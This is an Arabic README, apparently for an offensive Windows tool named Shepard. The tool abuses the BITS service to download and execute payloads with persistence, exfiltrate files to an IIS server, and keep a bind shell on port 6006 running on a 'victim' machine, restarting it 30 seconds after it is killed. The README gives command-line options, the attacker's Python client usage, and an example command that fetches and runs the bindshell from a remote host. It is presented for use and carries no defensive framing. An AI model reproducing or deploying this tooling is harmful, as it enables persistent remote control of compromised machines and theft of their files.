
أداة تحميل/رفع/تنفيذ مستمرة قيد التطوير باستخدام BITS في ويندوز.
هذه أداة استمرارية تستخدم Windows Background Intelligent Transfer Service (BITS).
تنزيل الملفات، استخراج الملفات، تنزيل الملفات + تنفيذ مستمر
شغّل shepard.exe كمسؤول باستخدام وسائط سطر الأوامر التالية:
-d <remoteLocation> <writePath> : تنزيل ملف عادي إلى مسار محلي من اختيارك
-e <remoteLocation> <localPath> : رفع ملف عادي من مسار محلي من اختيارك (يرسل فقط إلى خادم IIS، هذا قيد في BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : تنزيل ملف إلى مسار من اختيارك، وسيحاول الحفاظ على الاستمرارية. سيحاول الملف الذي تم تنزيله التشغيل باستخدام optionalFileArgs وسيتحقق BITS كل 30 ثانية للتأكد من أن الملف لا يزال قيد التشغيل على النظام المخترق.
تشغيل هذا الملف التنفيذي بدون وسائط أو بعدد غير صحيح من الوسائط سيؤدي إلى خروج shepard بشكل نظيف.
الخادم (الضحية) مكتوب باستخدام C#. يستمع على المنفذ 6006.
شغّل shepardsbind_serv.exe بدون وسائط.
العميل (المهاجم) مكتوب باستخدام Python ويأخذ وسيطة واحدة: عنوان IP الخاص بجهاز الضحية.
shepardsbind_recv.py <victim's IP>
تشغيل shepardsbind_recv.py بدون وسائط سيعيد خطأ.
الملف التنفيذي الوحيد الذي يجب أن يكون على جهاز الضحية هو shepard.exe. استضف الملف التنفيذي للـ bindshell القابل للتنزيل في مكان يمكن الوصول إليه علنًا. سوف يقوم Shepard بتنزيل وتشغيل الملف التنفيذي للـ bindshell، ويمكن للمستخدم الآن استخدام مستقبل python. إذا تم العثور على الصدفة وقتلها، فستتم إعادة تشغيلها بعد 30 ثانية.
مثال: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe